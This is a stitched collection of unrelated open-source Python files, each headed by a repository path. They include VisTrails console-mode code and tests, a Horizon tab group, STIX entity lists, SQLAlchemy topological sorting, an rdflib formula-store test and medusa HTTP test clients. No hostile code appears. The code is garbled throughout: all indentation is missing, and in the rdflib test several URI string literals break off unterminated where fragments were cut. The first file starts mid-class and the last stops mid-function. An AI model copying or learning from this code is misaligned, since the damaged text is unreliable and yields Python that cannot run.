self._firefox_env['LD_PRELOAD'] = self.NO_FOCUS_LIBRARY_NAME
def _extract_and_check(self, profile, no_focus_so_name, x86, amd64):
paths = [x86, amd64]
built_path = ""
for path in paths:
library_path = os.path.join(profile.path, path)
os.makedirs(library_path)
import shutil
shutil.copy(os.path.join(os.path.dirname(__file__), path,
self.NO_FOCUS_LIBRARY_NAME),
library_path)
built_path += library_path + ":"
return built_path
def which(self, fname):
"""Returns the fully qualified path by searching Path of the given
name"""
for pe in os.environ['PATH'].split(os.pathsep):
checkname = os.path.join(pe, fname)
if os.access(checkname, os.X_OK) and not os.path.isdir(checkname):
return checkname
return None
|
data/VisTrails/VisTrails/vistrails/core/console_mode.py
|
""" Module used when running vistrails uninteractively """
from __future__ import absolute_import, division
import os.path
import unittest
from vistrails.core.application import is_running_gui
from vistrails.core.configuration import get_vistrails_configuration
import vistrails.core.interpreter.default
import vistrails.core.db.io
from vistrails.core.db.io import load_vistrail
from vistrails.core.db.locator import XMLFileLocator, ZIPFileLocator
from vistrails.core import debug
import vistrails.core.interpreter.cached
from vistrails.core.vistrail.job import Workflow as JobWorkflow
import vistrails.core.vistrail.pipeline
from vistrails.core.utils import VistrailsInternalError
from vistrails.core.vistrail.controller import VistrailController
import vistrails.core.packagemanager
import vistrails.core.system
import vistrails.core.vistrail
import vistrails.db
def run_and_get_results(w_list, parameters='',
update_vistrail=True, extra_info=None,
reason='Console Mode Execution'):
"""run_and_get_results(w_list: list of (locator, version), parameters: str,
output_dir:str, update_vistrail: boolean,
extra_info:dict)
Run all workflows in w_list, and returns an interpreter result object.
version can be a tag name or a version id.
"""
elements = parameters.split("$&$")
aliases = {}
params = []
result = []
for locator, workflow in w_list:
(v, abstractions , thumbnails, mashups) = load_vistrail(locator)
controller = VistrailController(v, locator, abstractions, thumbnails,
mashups, auto_save=update_vistrail)
if isinstance(workflow, basestring):
version = v.get_version_number(workflow)
elif isinstance(workflow, (int, long)):
version = workflow
elif workflow is None:
version = controller.get_latest_version_in_graph()
else:
msg = "Invalid version tag or number: %s" % workflow
raise VistrailsInternalError(msg)
controller.change_selected_version(version)
for e in elements:
pos = e.find("=")
if pos != -1:
key = e[:pos].strip()
value = e[pos+1:].strip()
if controller.current_pipeline.has_alias(key):
aliases[key] = value
elif 'mashup_id' in extra_info:
for mashuptrail in mashups:
if mashuptrail.vtVersion == version:
mashup = mashuptrail.getMashup(extra_info['mashup_id'])
c = mashup.getAliasByName(key).component
params.append((c.vttype, c.vtid, value))
if not update_vistrail:
conf = get_vistrails_configuration()
if conf.has('thumbs'):
conf.thumbs.autoSave = False
jobMonitor = controller.jobMonitor
current_workflow = jobMonitor.currentWorkflow()
if not current_workflow:
for job in jobMonitor.workflows.itervalues():
try:
job_version = int(job.version)
except ValueError:
try:
job_version = v.get_version_number(job.version)
except KeyError:
continue
if version == job_version:
current_workflow = job
jobMonitor.startWorkflow(job)
if not current_workflow:
current_workflow = JobWorkflow(version)
jobMonitor.startWorkflow(current_workflow)
try:
(results, _) = \
controller.execute_current_workflow(custom_aliases=aliases,
custom_params=params,
extra_info=extra_info,
reason=reason)
finally:
jobMonitor.finishWorkflow()
new_version = controller.current_version
if new_version != version:
debug.log("Version '%s' (%s) was upgraded. The actual "
"version executed was %s" % (
workflow, version, new_version))
run = results[0]
run.workflow_info = (locator.name, new_version)
run.pipeline = controller.current_pipeline
if update_vistrail:
controller.write_vistrail(locator)
result.append(run)
if current_workflow.jobs:
if current_workflow.completed():
run.job = "COMPLETED"
else:
run.job = "RUNNING: %s" % current_workflow.id
for job in current_workflow.jobs.itervalues():
if not job.finished:
run.job += "\n %s %s %s" % (job.start, job.name, job.description())
print run.job
return result
def get_wf_graph(w_list, output_dir, pdf=False):
"""run_and_get_results(w_list: list of (locator, version),
output_dir:str, pdf:bool)
Load all workflows in wf_list and dump their graph to output_dir.
"""
result = []
if is_running_gui():
from vistrails.gui.vistrail_controller import VistrailController as \
GUIVistrailController
for locator, workflow in w_list:
try:
(v, abstractions , thumbnails, mashups) = load_vistrail(locator)
controller = GUIVistrailController(v, locator, abstractions,
thumbnails, mashups,
auto_save=False)
controller.current_pipeline_view.set_controller(controller)
version = None
if isinstance(workflow, basestring):
version = v.get_version_number(workflow)
elif isinstance(workflow, (int, long)):
version = workflow
elif workflow is None:
version = controller.get_latest_version_in_graph()
else:
msg = "Invalid version tag or number: %s" % workflow
raise VistrailsInternalError(msg)
controller.change_selected_version(version)
if controller.current_pipeline is not None:
controller.updatePipelineScene()
if pdf:
base_fname = "%s_%s_pipeline.pdf" % \
(locator.short_filename, version)
filename = os.path.join(output_dir, base_fname)
controller.current_pipeline_scene.saveToPDF(filename)
else:
base_fname = "%s_%s_pipeline.png" % \
(locator.short_filename, version)
filename = os.path.join(output_dir, base_fname)
controller.current_pipeline_scene.saveToPNG(filename)
result.append((True, ""))
except Exception, e:
result.append((False, debug.format_exception(e)))
else:
error_str = "Cannot save pipeline figure when not " \
"running in gui mode"
debug.critical(error_str)
result.append((False, error_str))
return result
def get_vt_graph(vt_list, tree_info, pdf=False):
"""get_vt_graph(vt_list: list of locator, tree_info:str)
Load all vistrails in vt_list and dump their tree to tree_info.
"""
result = []
if is_running_gui():
from vistrails.gui.vistrail_controller import VistrailController as \
GUIVistrailController
for locator in vt_list:
try:
(v, abstractions , thumbnails, mashups) = load_vistrail(locator)
controller = GUIVistrailController(v, locator, abstractions,
thumbnails, mashups)
if tree_info is not None:
from vistrails.gui.version_view import QVersionTreeView
version_view = QVersionTreeView()
version_view.scene().setupScene(controller)
if pdf:
base_fname = "graph_%s.pdf" % locator.short_filename
filename = os.path.join(tree_info, base_fname)
version_view.scene().saveToPDF(filename)
else:
base_fname = "graph_%s.png" % locator.short_filename
filename = os.path.join(tree_info, base_fname)
version_view.scene().saveToPNG(filename)
del version_view
result.append((True, ""))
except Exception, e:
result.append((False, debug.format_exception(e)))
else:
error_str = "Cannot save version tree figure when not " \
"running in gui mode"
debug.critical(error_str)
result.append((False, error_str))
return result
def run(w_list, parameters='', update_vistrail=True,
extra_info=None, reason="Console Mode Execution"):
"""run(w_list: list of (locator, version), parameters: str) -> boolean
Run all workflows in w_list, version can be a tag name or a version id.
Returns list of errors (empty list if there are no errors)
"""
all_errors = []
results = run_and_get_results(w_list, parameters,
update_vistrail,extra_info, reason)
for result in results:
(objs, errors, executed) = (result.objects,
result.errors, result.executed)
for err in sorted(errors.iteritems()):
all_errors.append(result.workflow_info + err)
return all_errors
def run_parameter_exploration(locator, pe_id, extra_info = {},
reason="Console Mode Parameter Exploration Execution"):
"""run_parameter_exploration(w_list: (locator, version),
pe_id: str/int,
reason: str) -> (pe_id, [error msg])
Run parameter exploration in w, and returns an interpreter result object.
version can be a tag name or a version id.
"""
if is_running_gui():
from vistrails.gui.vistrail_controller import VistrailController as \
GUIVistrailController
try:
(v, abstractions , thumbnails, mashups) = load_vistrail(locator)
controller = GUIVistrailController(v, locator, abstractions,
thumbnails, mashups)
try:
pe_id = int(pe_id)
pe = controller.vistrail.get_paramexp(pe_id)
except ValueError:
pe = controller.vistrail.get_named_paramexp(pe_id)
controller.change_selected_version(pe.action_id)
controller.executeParameterExploration(pe, extra_info=extra_info,
showProgress=False)
except Exception, e:
return (locator, pe_id,
debug.format_exception(e), debug.format_exc())
def run_parameter_explorations(w_list, extra_info = {},
reason="Console Mode Parameter Exploration Execution"):
"""run(w_list: list of (locator, pe_id), reason: str) -> boolean
For each workflow in w_list, run parameter exploration pe_id
version can be a tag name or a version id.
Returns list of errors (empty list if there are no errors)
"""
all_errors = []
for locator, pe_id in w_list:
result = run_parameter_exploration(locator, pe_id, reason=reason,
extra_info=extra_info)
if result:
all_errors.append(result)
return all_errors
def cleanup():
vistrails.core.interpreter.cached.CachedInterpreter.cleanup()
class TestConsoleMode(unittest.TestCase):
@classmethod
def setUpClass(cls):
manager = vistrails.core.packagemanager.get_package_manager()
if manager.has_package('org.vistrails.vistrails.console_mode_test'):
return
d = {'console_mode_test': 'vistrails.tests.resources.'}
manager.late_enable_package('console_mode_test',d)
@classmethod
def tearDownClass(cls):
manager = vistrails.core.packagemanager.get_package_manager()
if manager.has_package('org.vistrails.vistrails.console_mode_test'):
manager.late_disable_package('console_mode_test')
def test1(self):
from vistrails.core.modules.basic_modules import StandardOutput
values = []
def mycompute(s):
v = s.get_input('value')
values.append(v)
orig_compute = StandardOutput.compute
StandardOutput.compute = mycompute
try:
locator = XMLFileLocator(vistrails.core.system.vistrails_root_directory() +
'/tests/resources/dummy.xml')
result = run([(locator, "int chain")], update_vistrail=False)
self.assertEqual(len(result), 0)
self.assertEqual(values, [2])
finally:
StandardOutput.compute = orig_compute
def test_tuple(self):
from vistrails.core.vistrail.module_param import ModuleParam
from vistrails.core.vistrail.module_function import ModuleFunction
from vistrails.core.utils import DummyView
from vistrails.core.vistrail.module import Module
import vistrails.db.domain
id_scope = vistrails.db.domain.IdScope()
interpreter = vistrails.core.interpreter.default.get_default_interpreter()
v = DummyView()
p = vistrails.core.vistrail.pipeline.Pipeline()
params = [ModuleParam(id=id_scope.getNewId(ModuleParam.vtType),
pos=0,
type='Float',
val='2.0',
),
ModuleParam(id=id_scope.getNewId(ModuleParam.vtType),
pos=1,
type='Float',
val='2.0',
)]
function = ModuleFunction(id=id_scope.getNewId(ModuleFunction.vtType),
name='input')
function.add_parameters(params)
module = Module(id=id_scope.getNewId(Module.vtType),
name='TestTupleExecution',
package='org.vistrails.vistrails.console_mode_test',
version='0.9.1')
module.add_function(function)
p.add_module(module)
interpreter.execute(p,
locator=XMLFileLocator('foo'),
current_version=1L,
view=v)
def test_python_source(self):
locator = XMLFileLocator(vistrails.core.system.vistrails_root_directory() +
'/tests/resources/pythonsource.xml')
result = run([(locator,"testPortsAndFail")], update_vistrail=False)
self.assertEqual(len(result), 0)
def test_python_source_2(self):
locator = XMLFileLocator(vistrails.core.system.vistrails_root_directory() +
'/tests/resources/pythonsource.xml')
result = run_and_get_results([(locator, "test_simple_success")],
update_vistrail=False)[0]
self.assertEquals(len(result.executed), 1)
def test_dynamic_module_error(self):
locator = XMLFileLocator(vistrails.core.system.vistrails_root_directory() +
'/tests/resources/dynamic_module_error.xml')
result = run([(locator, "test")], update_vistrail=False)
self.assertNotEqual(len(result), 0)
def test_change_parameter(self):
locator = XMLFileLocator(vistrails.core.system.vistrails_root_directory() +
'/tests/resources/test_change_vistrail.xml')
result = run([(locator, "v1")], update_vistrail=False)
self.assertEqual(len(result), 0)
result = run([(locator, "v2")], update_vistrail=False)
self.assertEquals(len(result), 0)
def test_ticket_73(self):
locator = XMLFileLocator(vistrails.core.system.vistrails_root_directory() +
'/tests/resources/test_ticket_73.xml')
v = locator.load()
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
locator = XMLFileLocator(filename)
try:
locator.save(v)
finally:
os.remove(filename)
if __name__ == '__main__':
unittest.main()
|
data/Havate/havate-openstack/proto-build/gui/horizon/Horizon_GUI/openstack_dashboard/dashboards/router/nexus1000v/tabs.py
|
from django.utils.translation import ugettext_lazy as _
from horizon import tabs
class NetworkProfileTab(tabs.Tab):
name = _("Network Profile")
slug = "network_profile"
template_name = 'router/nexus1000v/network_profile/index.html'
def get_context_data(self, request):
return None
class PolicyProfileTab(tabs.Tab):
name = _("Policy Profile")
slug = "policy_profile"
template_name = 'router/nexus1000v/policy_profile/index.html'
preload = False
class IndexTabs(tabs.TabGroup):
slug = "indextabs"
tabs = (NetworkProfileTab, PolicyProfileTab)
|
data/StackStorm/st2contrib/packs/bitbucket/actions/lib/action.py
|
from st2actions.runners.pythonrunner import Action
from bitbucket.bitbucket import Bitbucket
class BitBucketAction(Action):
def __init__(self, config):
super(BitBucketAction, self).__init__(config)
def _get_client(self, repo=None):
if repo:
bb = Bitbucket(username=self.config['username'],
password=self.config['password'],
repo_name_or_slug=repo)
else:
bb = Bitbucket(username=self.config['email'],
password=self.config['password'])
return bb
|
data/KunihikoKido/sublime-elasticsearch-client/commands/delete_document.py
|
import sublime
from .base import DeleteBaseCommand
class DeleteDocumentCommand(DeleteBaseCommand):
command_name = "elasticsearch:delete-document"
def is_enabled(self):
return True
def run_request(self, id=None):
if not id:
self.show_input_panel('Document Id: ', '', self.run)
return
options = dict(
index=self.settings.index,
doc_type=self.settings.doc_type,
id=id
)
if sublime.ok_cancel_dialog("Are you sure you want to delete?", ok_title='Delete'):
return self.client.delete(**options)
|
data/IEEERobotics/bot/bot/follower/pid.py
|
class PID(object):
def __init__(self):
"""initizes value for the PID"""
self.kd = 0
self.ki = 0
self.kp = 1
self.previous_error = 0
self.integral_error = 0
def set_k_values(self, kp, kd, ki):
self.kp = kp
self.ki = ki
self.kd = kd
def clear_error(self):
self.previous_error = 0
self.integeral_error = 0
def pid(self, target, process_var, timestep):
current_error = (target - process_var)
p_error = self.kp * current_error
d_error = self.kd * (current_error - self.previous_error) \
/ timestep
self.integral_error = (
current_error + self.previous_error) / 2 \
+ self.integral_error
i_error = self.ki * self.integral_error
total_error = p_error + d_error + i_error
self.previous_error = current_error
return total_error
|
data/UFAL-DSG/cloud-asr/cloudasr/master/lib.py
|
import zmq
import time
from collections import defaultdict
from cloudasr import Poller
from cloudasr.messages import HeartbeatMessage
from cloudasr.messages.helpers import *
def create_master(worker_address, frontend_address, monitor_address):
poller = create_poller(worker_address, frontend_address)
context = zmq.Context()
monitor = context.socket(zmq.PUSH)
monitor.connect(monitor_address)
run_forever = lambda: True
return Master(poller, monitor, run_forever)
def create_poller(worker_address, frontend_address):
context = zmq.Context()
worker_socket = context.socket(zmq.PULL)
worker_socket.bind(worker_address)
frontend_socket = context.socket(zmq.REP)
frontend_socket.bind(frontend_address)
sockets = {
"worker": {"socket": worker_socket, "receive": worker_socket.recv, "send": worker_socket.send_json},
"frontend": {"socket": frontend_socket, "receive": frontend_socket.recv, "send": frontend_socket.send},
}
time_func = time.time
return Poller(sockets, time_func)
class Master:
def __init__(self, poller, monitor, should_continue):
self.poller = poller
self.should_continue = should_continue
self.workers = WorkerPool(monitor)
self.time = 0
def run(self):
while self.should_continue():
messages, self.time = self.poller.poll()
if "worker" in messages:
self.handle_worker_request(messages["worker"])
if "frontend" in messages:
self.handle_fronted_request(messages["frontend"])
def handle_fronted_request(self, message):
try:
request = parseWorkerRequestMessage(message)
model = request.model
worker = self.workers.get_worker(model, self.time)
message = createMasterResponseMessage("SUCCESS", worker)
self.poller.send("frontend", message.SerializeToString())
except NoWorkerAvailableException:
message = createMasterResponseMessage("ERROR")
self.poller.send("frontend", message.SerializeToString())
def handle_worker_request(self, message):
statuses = {
HeartbeatMessage.STARTED: "STARTED",
HeartbeatMessage.WAITING: "WAITING",
HeartbeatMessage.WORKING: "WORKING",
HeartbeatMessage.FINISHED: "FINISHED"
}
heartbeat = parseHeartbeatMessage(message)
address = heartbeat.address
model = heartbeat.model
status = statuses[heartbeat.status]
self.workers.add_worker(model, address, status, self.time)
class WorkerPool:
def __init__(self, monitor):
self.workers_status = defaultdict(lambda: {"status": "STARTED", "last_heartbeat": 0, "waiting_for_first_chunk_secs": 0})
self.available_workers = defaultdict(list)
self.monitor = monitor
def get_worker(self, model, time):
worker = self.find_available_worker(model, time)
if worker is None:
raise NoWorkerAvailableException()
self.update_worker_status(model, worker, "WORKING", time)
return worker
def find_available_worker(self, model, time):
while len(self.available_workers[model]) > 0:
worker = self.available_workers[model].pop(0)
if self.is_worker_available(worker, time):
return worker
return None
def is_worker_available(self, worker, time):
status = self.workers_status[worker]
return status["status"] and status["last_heartbeat"] > time - 10
def add_worker(self, model, address, status, time):
worker_status = self.workers_status[address]["status"]
if worker_status == "WORKING":
if status == "FINISHED" or status == "STARTED":
self.available_workers[model].append(address)
self.update_worker_status(model, address, "WAITING", time)
if status == "WORKING":
self.update_worker_status(model, address, "WORKING", time)
if status == "WAITING":
self.workers_status[address]["waiting_for_first_chunk_secs"] += 1
if self.workers_status[address]["waiting_for_first_chunk_secs"] == 10:
self.available_workers[model].append(address)
self.update_worker_status(model, address, "WAITING", time)
elif worker_status == "STARTED":
self.available_workers[model].append(address)
self.update_worker_status(model, address, "STARTED", time)
elif worker_status == "WAITING":
self.update_worker_status(model, address, "WAITING", time)
def update_worker_status(self, model, worker, status, time):
self.workers_status[worker] = {
"status": "WAITING" if status == "STARTED" else status,
"last_heartbeat": time,
"waiting_for_first_chunk_secs": 0
}
worker_status = createWorkerStatusMessage(worker, model, status, int(time))
self.monitor.send(worker_status.SerializeToString())
class NoWorkerAvailableException(Exception):
pass
|
data/TwilioDevEd/appointment-reminders-flask/tests/base_test.py
|
import unittest
from models.appointment import Appointment
class BaseTest(unittest.TestCase):
def setUp(self):
from reminders import app, db
self.app = app
self.db = db
self.celery = app.celery()
self.test_client = app.flask_app.test_client()
self.app.flask_app.config['WTF_CSRF_ENABLED'] = False
def tearDown(self):
self.db.session.query(Appointment).delete()
self.db.session.commit()
self.celery.control.purge()
self.celery.conf.CELERY_ALWAYS_EAGER = False
|
data/STIXProject/python-stix/stix/core/__init__.py
|
import stix
from stix.utils.deprecated import idref_deprecated
from stix.campaign import Campaign
from stix.coa import CourseOfAction
from stix.exploit_target import ExploitTarget
from stix.indicator import Indicator
from stix.incident import Incident
from stix.report import Report
from stix.threat_actor import ThreatActor
from stix.bindings import stix_core as stix_core_binding
from stix.bindings import stix_common as stix_common_binding
class Campaigns(stix.EntityList):
_binding = stix_core_binding
_namespace = 'http://stix.mitre.org/stix-1'
_binding_class = _binding.CampaignsType
_contained_type = Campaign
_binding_var = "Campaign"
_inner_name = "campaigns"
_dict_as_list = True
def _is_valid(self, value):
idref_deprecated(value)
return stix.EntityList._is_valid(self, value)
class CoursesOfAction(stix.EntityList):
_binding = stix_core_binding
_namespace = 'http://stix.mitre.org/stix-1'
_binding_class = _binding.CoursesOfActionType
_contained_type = CourseOfAction
_binding_var = "Course_Of_Action"
_inner_name = "courses_of_action"
_dict_as_list = True
def _is_valid(self, value):
idref_deprecated(value)
return stix.EntityList._is_valid(self, value)
class ExploitTargets(stix.EntityList):
_binding = stix_common_binding
_namespace = 'http://stix.mitre.org/common-1'
_binding_class = _binding.ExploitTargetsType
_contained_type = ExploitTarget
_binding_var = "Exploit_Target"
_inner_name = "exploit_targets"
_dict_as_list = True
def _is_valid(self, value):
idref_deprecated(value)
return stix.EntityList._is_valid(self, value)
class Incidents(stix.EntityList):
_binding = stix_core_binding
_namespace = 'http://stix.mitre.org/stix-1'
_binding_class = _binding.IncidentsType
_contained_type = Incident
_binding_var = "Incident"
_inner_name = "incidents"
_dict_as_list = True
def _is_valid(self, value):
idref_deprecated(value)
return stix.EntityList._is_valid(self, value)
class Indicators(stix.EntityList):
_binding = stix_core_binding
_namespace = 'http://stix.mitre.org/stix-1'
_binding_class = _binding.IndicatorsType
_contained_type = Indicator
_binding_var = "Indicator"
_inner_name = "indicators"
_dict_as_list = True
def _is_valid(self, value):
idref_deprecated(value)
return stix.EntityList._is_valid(self, value)
class ThreatActors(stix.EntityList):
_binding = stix_core_binding
_namespace = 'http://stix.mitre.org/stix-1'
_binding_class = _binding.ThreatActorsType
_contained_type = ThreatActor
_binding_var = "Threat_Actor"
_inner_name = "threat_actors"
_dict_as_list = True
def _is_valid(self, value):
idref_deprecated(value)
return stix.EntityList._is_valid(self, value)
class Reports(stix.EntityList):
_binding = stix_core_binding
_namespace = 'http://stix.mitre.org/stix-1'
_binding_class = _binding.ReportsType
_contained_type = Report
_binding_var = "Report"
_inner_name = "reports"
_dict_as_list = True
def _is_valid(self, value):
idref_deprecated(value)
return stix.EntityList._is_valid(self, value)
from stix_package import STIXPackage
from stix_header import STIXHeader
|
data/SickRage/SickRage/lib/sqlalchemy/util/topological.py
|
"""Topological sorting algorithms."""
from ..exc import CircularDependencyError
from .. import util
__all__ = ['sort', 'sort_as_subsets', 'find_cycles']
def sort_as_subsets(tuples, allitems):
edges = util.defaultdict(set)
for parent, child in tuples:
edges[child].add(parent)
todo = set(allitems)
while todo:
output = set()
for node in list(todo):
if not todo.intersection(edges[node]):
output.add(node)
if not output:
raise CircularDependencyError(
"Circular dependency detected.",
find_cycles(tuples, allitems),
_gen_edges(edges)
)
todo.difference_update(output)
yield output
def sort(tuples, allitems):
"""sort the given list of items by dependency.
'tuples' is a list of tuples representing a partial ordering.
"""
for set_ in sort_as_subsets(tuples, allitems):
for s in set_:
yield s
def find_cycles(tuples, allitems):
edges = util.defaultdict(set)
for parent, child in tuples:
edges[parent].add(child)
nodes_to_test = set(edges)
output = set()
for node in nodes_to_test:
stack = [node]
todo = nodes_to_test.difference(stack)
while stack:
top = stack[-1]
for node in edges[top]:
if node in stack:
cyc = stack[stack.index(node):]
todo.difference_update(cyc)
output.update(cyc)
if node in todo:
stack.append(node)
todo.remove(node)
break
else:
node = stack.pop()
return output
def _gen_edges(edges):
return set([
(right, left)
for left in edges
for right in edges[left]
])
|
data/RDFLib/rdflib/test/test_graph_formula.py
|
import sys
import os
from tempfile import mkdtemp, mkstemp
from rdflib import RDF, RDFS, URIRef, BNode, Variable, plugin
from rdflib.graph import QuotedGraph, ConjunctiveGraph
implies = URIRef("http://www.w3.org/2000/10/swap/log
testN3 = """
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema
@prefix : <http://test/> .
{:a :b :c;a :foo} => {:a :d :c,?y}.
_:foo a rdfs:Class.
:a :d :c."""
from nose.tools import nottest
from nose.exc import SkipTest
@nottest
def testFormulaStore(store="default", configString=None):
try:
g = ConjunctiveGraph(store=store)
except ImportError:
raise SkipTest("Dependencies for store '%s' not available!" % store)
if configString:
g.destroy(configString)
g.open(configString)
else:
if store == 'SQLite':
_, path = mkstemp(prefix='test', dir='/tmp', suffix='.sqlite')
g.open(path, create=True)
else:
g.open(mkdtemp(), create=True)
g.parse(data=testN3, format="n3")
try:
for s, p, o in g.triples((None, implies, None)):
formulaA = s
formulaB = o
assert type(formulaA) == QuotedGraph and type(formulaB) == QuotedGraph
b = URIRef('http://test/b')
c = URIRef('http://test/c')
d = URIRef('http://test/d')
v = Variable('y')
universe = ConjunctiveGraph(g.store)
assert len(list(universe.triples((formulaA, implies, formulaB)))) == 1
assert len(list(formulaB.triples((None, None, v)))) == 1
for s, p, o in formulaB.triples((None, d, None)):
if o != c:
assert isinstance(o, Variable)
assert o == v
s = list(universe.subjects(RDF.type, RDFS.Class))[0]
assert isinstance(s, BNode)
assert len(list(universe.triples((None, implies, None)))) == 1
assert len(list(universe.triples((None, RDF.type, None)))) == 1
assert len(list(formulaA.triples((None, RDF.type, None)))) == 1
assert len(list(formulaA.triples((None, None, None)))) == 2
assert len(list(formulaB.triples((None, None, None)))) == 2
assert len(list(universe.triples((None, None, None)))) == 3
assert len(list(formulaB.triples(
(None, URIRef('http://test/d'), None)))) == 2
assert len(list(universe.triples(
(None, URIRef('http://test/d'), None)))) == 1
universe.remove((None, implies, None))
assert len(list(universe.triples((None, implies, None)))) == 0
assert len(list(formulaA.triples((None, None, None)))) == 2
assert len(list(formulaB.triples((None, None, None)))) == 2
formulaA.remove((None, b, None))
assert len(list(formulaA.triples((None, None, None)))) == 1
formulaA.remove((None, RDF.type, None))
assert len(list(formulaA.triples((None, None, None)))) == 0
universe.remove((None, RDF.type, RDFS.Class))
universe.remove_context(formulaB)
assert len(list(universe.triples((None, RDF.type, None)))) == 0
assert len(universe) == 1
assert len(formulaB) == 0
universe.remove((None, None, None))
assert len(universe) == 0
g.close()
if store == 'SQLite':
os.unlink(path)
else:
g.store.destroy(configString)
except:
g.close()
if store == 'SQLite':
os.unlink(path)
else:
g.store.destroy(configString)
raise
def testFormulaStores():
pluginname = None
if __name__ == '__main__':
if len(sys.argv) > 1:
pluginname = sys.argv[1]
for s in plugin.plugins(pluginname, plugin.Store):
if s.name in (
'Auditable', 'Concurrent',
'SPARQLStore', 'SPARQLUpdateStore',
):
continue
if not s.getClass().formula_aware:
continue
yield testFormulaStore, s.name
if __name__ == '__main__':
import nose
nose.main(defaultTest=sys.argv[0])
|
data/adblockplus/gyp/test/win/gyptest-cl-function-level-linking.py
|
"""
Make sure function-level linking setting is extracted properly.
"""
import TestGyp
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'compiler-flags'
test.run_gyp('function-level-linking.gyp', chdir=CHDIR)
test.build('function-level-linking.gyp', test.ALL, chdir=CHDIR)
def CheckForSectionString(binary, search_for, should_exist):
output = test.run_dumpbin('/headers', binary)
if should_exist and search_for not in output:
print 'Did not find "%s" in %s' % (search_for, binary)
test.fail_test()
elif not should_exist and search_for in output:
print 'Found "%s" in %s (and shouldn\'t have)' % (search_for, binary)
test.fail_test()
def Object(proj, obj):
sep = '.' if test.format == 'ninja' else '\\'
return 'obj\\%s%s%s' % (proj, sep, obj)
look_for = '''COMDAT; sym= "int __cdecl comdat_function'''
CheckForSectionString(
test.built_file_path(Object('test_fll_on', 'function-level-linking.obj'),
chdir=CHDIR),
look_for,
should_exist=True)
CheckForSectionString(
test.built_file_path(Object('test_fll_off', 'function-level-linking.obj'),
chdir=CHDIR),
look_for,
should_exist=False)
test.pass_test()
|
data/SMFOSS/CheesePrism/cheeseprism/event.py
|
from zope.interface import Attribute
from zope.interface import Interface
from zope.interface import implements
class IIndexEvent(Interface):
"""
An lower level event involving the index
"""
class IIndexUpdate(Interface):
"""
An low level event involving the index
"""
class IPackageEvent(IIndexEvent):
"""
An event involving a package
"""
path = Attribute('Path to package')
class IPackageAdded(IPackageEvent):
"""
A package is added to the repository
"""
class IPackageRemoved(IPackageEvent):
"""
A package is removed to the repository
"""
class IndexEvent(object):
implements(IIndexEvent)
def __init__(self, datafile, index):
self.index = index
self.datafile = datafile
class IndexUpdate(IndexEvent):
implements(IIndexUpdate)
class PackageEvent(object):
"""
Baseclass for pacakage events
"""
implements(IPackageEvent)
def __init__(self, index_manager, path=None, name=None, version=None):
self.name = name
self.version = version
self.im = index_manager
self.path = path
if self.name is None and self.path:
info = self.im.pkginfo_from_file(path, self.im.move_on_error)
self.name = info.name
self.version = info.version
class PackageAdded(PackageEvent):
implements(IPackageAdded)
class PackageRemoved(PackageEvent):
implements(IPackageRemoved)
|
data/Net-ng/kansha/kansha/alembic/versions/b740362087_adding_max_cards.py
|
"""adding max cards
Revision ID: b740362087
Revises: 537fa16b46e7
Create Date: 2013-09-19 17:37:37.027495
"""
revision = 'b740362087'
down_revision = '537fa16b46e7'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('column', sa.Column('nb_max_cards', sa.Integer))
def downgrade():
op.drop_column('column', 'nb_max_cards')
|
data/accumulo/pyaccumulo/version.py
|
__all__ = ("get_git_version")
import os
import sys
import traceback
from subprocess import Popen, PIPE
def call_git_describe(abbrev=4):
dot_git = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'.git')
if not os.path.exists(dot_git):
return None, None
line = None
p = None
try:
p = Popen(['git', 'describe', '--abbrev=%d' % abbrev],
stdout=PIPE, stderr=PIPE,
cwd=os.path.dirname(os.path.abspath(__file__)))
p.stderr.close()
describe_line = p.stdout.readlines()[0].strip()
p = Popen(['git', 'rev-parse', 'HEAD'],
stdout=PIPE, stderr=PIPE)
p.stderr.close()
source_hash = p.stdout.readlines()[0].strip()
source_hash = source_hash[:abbrev]
parts = describe_line.split('-')
if len(parts) == 1:
version = parts[0]
else:
ver, rel, source_hash = parts
version_parts = ver.split('.')
lasti = len(version_parts) - 1
version_parts[lasti] = str(int(version_parts[lasti]) + 1)
version = '{}.dev{}'.format('.'.join(version_parts), rel)
return version, source_hash
except Exception, exc:
sys.stderr.write('line: %r\n' % line)
sys.stderr.write(traceback.format_exc(exc))
try:
sys.stderr.write('p.stderr.read()=%s\n' % p.stderr.read())
except Exception, exc:
sys.stderr.write(traceback.format_exc(exc))
try:
sys.stderr.write('os.getcwd()=%s\n' % os.getcwd())
except Exception, exc:
sys.stderr.write(traceback.format_exc(exc))
return None, None
def read_release_version():
try:
f = open("RELEASE-VERSION", "r")
try:
version = f.readlines()[0]
return version.strip().split(',')
finally:
f.close()
except:
return None, None
def write_release_version(version, source_hash):
f = open("RELEASE-VERSION", "w")
f.write("%s,%s\n" % (version, source_hash))
f.close()
def get_git_version(abbrev=4):
release_version, release_source_hash = read_release_version()
version, source_hash = call_git_describe(abbrev)
if version is None:
version = release_version
source_hash = release_source_hash
if version is None:
version = '0.0.0'
source_hash = ''
if version != release_version or source_hash != release_source_hash:
write_release_version(version, source_hash)
return version, source_hash
if __name__ == "__main__":
print get_git_version()
|
data/JeremyGrosser/supervisor/src/supervisor/medusa/test/test_11.py
|
import socket
import string
from supervisor.medusa import asyncore_25 as asyncore
from supervisor.medusa import asynchat_25 as asynchat
class test_client (asynchat.async_chat):
ac_in_buffer_size = 16384
ac_out_buffer_size = 16384
total_in = 0
concurrent = 0
max_concurrent = 0
def __init__ (self, addr, chain):
asynchat.async_chat.__init__ (self)
self.create_socket (socket.AF_INET, socket.SOCK_STREAM)
self.set_terminator ('\r\n\r\n')
self.connect (addr)
self.push (chain)
def handle_connect (self):
test_client.concurrent = test_client.concurrent + 1
if (test_client.concurrent > test_client.max_concurrent):
test_client.max_concurrent = test_client.concurrent
def handle_expt (self):
print 'unexpected FD_EXPT thrown. closing()'
self.close()
def close (self):
test_client.concurrent = test_client.concurrent - 1
asynchat.async_chat.close(self)
def collect_incoming_data (self, data):
test_client.total_in = test_client.total_in + len(data)
def found_terminator (self):
pass
def log (self, *args):
pass
import time
class timer:
def __init__ (self):
self.start = time.time()
def end (self):
return time.time() - self.start
def build_request_chain (num, host, request_size):
s = 'GET /test%d.html HTTP/1.1\r\nHost: %s\r\n\r\n' % (request_size, host)
